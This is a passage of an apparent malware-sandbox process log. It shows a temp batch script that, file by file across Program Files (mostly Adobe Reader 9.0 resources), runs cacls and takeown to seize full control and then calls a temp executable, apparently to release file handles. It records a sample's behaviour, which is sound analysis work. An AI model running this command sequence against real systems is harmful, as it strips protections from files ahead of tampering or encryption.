C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Music.jtp" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Music.jtp" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵
- Modifies file permissions
PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:620
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "RTC.der" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "RTC.der" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "email_all.gif" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "email_all.gif" -nobanner4⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:2016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "form_responses.gif" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:1792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:532
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "server_issue.gif" -nobanner3⤵PID:856
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "server_issue.gif" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:1868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "trash.gif" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "trash.gif" -nobanner4⤵PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:1348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Identity-H" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Identity-H" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵
- Modifies file permissions
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:1980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "brt.hyp" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "brt.hyp" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "can129.hsp" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "can129.hsp" -nobanner4⤵PID:1500
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "usa03.ths" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "usa03.ths" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:1472
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵
- Modifies file permissions
PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1112
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "info.gif" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "info.gif" -nobanner4⤵PID:620
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵
- Modifies file permissions
PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "server_lg.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "server_lg.gif" -nobanner4⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:2032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Identity-V" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Identity-V" -nobanner4⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:1584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SY______.PFM" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SY______.PFM" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1836
-
-
